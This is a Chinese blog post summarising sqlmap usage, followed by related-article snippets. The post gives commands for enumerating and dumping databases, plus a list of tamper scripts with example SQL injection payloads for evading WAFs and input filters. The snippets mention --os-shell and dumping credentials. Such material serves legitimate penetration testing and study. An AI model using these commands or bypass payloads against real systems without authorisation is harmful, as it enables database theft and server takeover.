SQLMAP使用总结

最新推荐文章于 2023-12-13 22:14:40 发布
最新推荐文章于 2023-12-13 22:14:40 发布
阅读量1.1k 收藏
点赞数
分类专栏: # 安全工具使用 文章标签: 数据库 postgresql mysql
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/115681925
版权

文章目录

获取可获得信息

sqlmap -r .\test.txt --current-db --current-user --hostname --is-dba

--current-user:当前正在执行相关数据库查询操作的 DBMS 用户
--current-db:当前web应用连接到的数据库名称
在这里插入图片描述
--is-dba:检验当前用户是不是数据库管理员
在这里插入图片描述
--dbs:如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。

--tables -D:-D指定数据库,列出数据库中所有的表

--columns -T -D:指定数据库名,表名,列出所有的列名。

--dump + 列名 -T指定表名 -D指定数据库名

实战:绕过转义单引号

https://blog.csdn.net/m0_37438418/article/details/79491010
在这里插入图片描述

各种tamper作用

01 apostrophemask.py#用utf8代替引号;Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

02 equaltolike.py#MSSQL * SQLite中like 代替等号;Example:  Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 1

03 greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

04 space2hash.py#空格替换为#号 随机字符串 以及换行符;Input: 1 AND 9227=9227;Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

05 apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;

06 halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论;

07 space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;

08 appendnullbyte.py#Microsoft Access在有效负荷结束位置加载零字节字符编码;Example: ('1 AND 1=1') '1 AND 1=1%00'

09 ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

10 space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12 space2mssqlhash.py#mssql查询中替换空格

13 modsecurityversioned.py#(mysql中过滤空格,包含完整的查询版本注释;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

14 space2mysqlblank.py#(mysql中空格替换其它空白符号

15 between.py#MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0中用between替换大于号(>)

16 space2mysqldash.py#MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

17 multiplespaces.py#围绕SQL关键字添加多个空格;Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

18 space2plus.py#用+替换空格;Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

19 bluecoat.py#MySQL 5.1, SGOS代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

20 nonrecursivereplacement.py#双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

21 space2randomblank.py#代替空格字符(“”)从一个随机的空白字符可选字符的有效集

22 sp_password.py#追加sp_password’从DBMS日志的自动模糊处理的26 有效载荷的末尾

23 chardoubleencode.py#双url编码(不处理以编码的)

24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25 charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;

26 randomcase.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写

27 unmagicquotes.py#宽字符绕过 GPC addslashes;Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

28 randomcomments.py#用/**/分割sql关键字;Example:‘INSERT’ becomes ‘IN//S//ERT’

29 charunicodeencode.py#ASP,ASP.NET中字符串 unicode 编码;

30 securesphere.py#追加特制的字符串;Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

31 versionedmorekeywords.py#MySQL >= 5.1.13注释绕过

32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33 halfversionedmorekeywords.py#MySQL < 5.1中关键字前加注释

sqlmap 用户手册中文版

地址:https://github.com/kvko/sqlmap-wiki-zhcn

天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP使用方法详解
Sys1em32 安全之路
03-11 445
一共有11种常见SQLmap使用方法: 一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 1 2 win:python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" Linux :.lmap.py -u "http://www.xxx.com/en/Com...
sqlmap使用总结1
08-03
10. **实战技巧**:在实际使用中,了解不同场景下如何调整参数、理解不同注入模式的原理以及如何绕过防御机制,是提高SQLMap使用效果的关键。 总之,SQLMap是一个功能强大的工具,它的高效性和灵活性使得它在渗透...
Sqlmap笔记
qq_59294755的博客
12-13 376
Sqlmap是一个自动检测和利用SQL注入漏洞的免费开源工具
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 1865
sqlmap一些指令
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7265
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs
Web安全工具—Sqlmap常用命令和参数(持续更新)
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库:access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
Sqlmap命令使用
一醉一休的博客
02-27 4153
Sqlmap基本命令使用总结常用23条命令
SQLmap使用手册1
08-03
在Ubuntu系统中,你可以通过终端使用`pip`来安装SQLmap。首先确保你的系统已经安装了Python和pip,然后执行以下命令: ```bash sudo apt-get update sudo apt-get install python3-pip pip3 install sqlmap ``` 这将...
sqlmap使用手册集合
06-10
总结SQLMap是强大的SQL注入工具,具备自动化和深度扫描功能,但同时也提醒我们重视网站的安全防护,避免SQL注入带来的风险。通过深入理解和熟练使用SQLMap,我们可以更好地保护我们的网络资源免受攻击。
sqlmap-master
最新发布
01-04
总结起来,SQLMap是一款强大的工具,它展示了SQL注入攻击的威力,同时也提醒我们在开发过程中必须重视SQL注入防护,确保应用的安全性。正确理解和使用SQLMap,对于网络安全专业人员和开发者来说,都是提升技能、保障...
sqlmap1.2安装包
11-13
此外,熟练掌握SQL注入技巧和理解SQL语句是使用SQLMap的前提,这将帮助你更好地利用工具并避免误操作。 **总结** SQLMap 1.2作为一款强大的SQL注入工具,为安全测试提供了便利,但同时也需要用户具备相应的安全...
总结一些SqlMap的常用tamper脚本释义.docx
02-02
SqlMap 是一个功能强大且广泛使用的 SQL 注入检测工具,它提供了多种 tamper 脚本来帮助用户绕过 Web 应用防火墙(WAF)和入侵检测系统(IDS),从而实现对网站漏洞的检测和利用。下面是常用的 SqlMap tamper 脚本...
sqlmap-需要安装python环境.rar
06-29
总结SQLMap是渗透测试者和安全研究人员的强大工具,通过Python环境的支撑,它能有效地帮助我们发现和利用SQL注入漏洞。正确安装和使用SQLMap,可以提高我们的安全测试效率,同时也能更好地保障Web应用程序的安全。
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
7. **总结**:SQLMap是一款强大的渗透测试工具,用于检测和利用SQL注入漏洞。了解并熟练掌握其用法,不仅可以帮助你提升安全防护能力,还能在合法范围内帮助你发现并修复潜在的安全问题。"Fox-scan-master"提供了...
sqlmap工具说明
tlucky的博客
03-06 1652
版本:v1.4.10支持环境:windows,linux等支持语言:python设计目的:可自动执行SQL注入缺陷的检测和开发过程,并接管数据库服务器实现:有强大的检测引擎,针对不同类型的数据库提供多样的渗透测试功能选项,实现数据库识别、数 据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令。,以及从数据 库指纹识别、从数据库获取数据、访问底层文件的广泛范围的交换机通过带外连接在操作系统上 执行命令。
SQLMap使用教程:萌新自用总结
tj2718647721的博客
07-10 118
可以通过 “--risk” “--level”调整 扫描级别,服务器存在WAF或者其他拦截器时,可以使用"-tamper"来变形Payload。使用 python sqlmap.py -r 1.txt --os -shell --level=3可以获取shell。--batch --smart -a自动注入 ,--batch --smart 自动选择 y/s/q。使用--dbs获得数据库列表,使用“-d 数据库名 --table”指定获得所有表名。使用“--dump”可以索取全部数据。
SQLMap使用详解
热门推荐
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
sqlmap 简单记
xuqi7
04-22 472
python sqlmap.py -u --dbs # 数据库 .. -D --tabels # 表名 .. -D -T --columns # 字段名 .. -D -T -C --dump # 脱裤 --current-db # 当前数据库 --current-user # 当前用户 --users # 枚举用户 --password # 枚举用户密码 –
SQLmap使用详解:自动检测与注入技巧
本文档主要总结SQLmap的一些核心功能和用法。 1. **寻找注入点** SQL注入通常是通过检查HTTP请求中的参数是否能够影响数据库查询来发现的。例如,`sqlmap -u "url"` 可以尝试对指定URL进行注入测试。 2. **GET...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值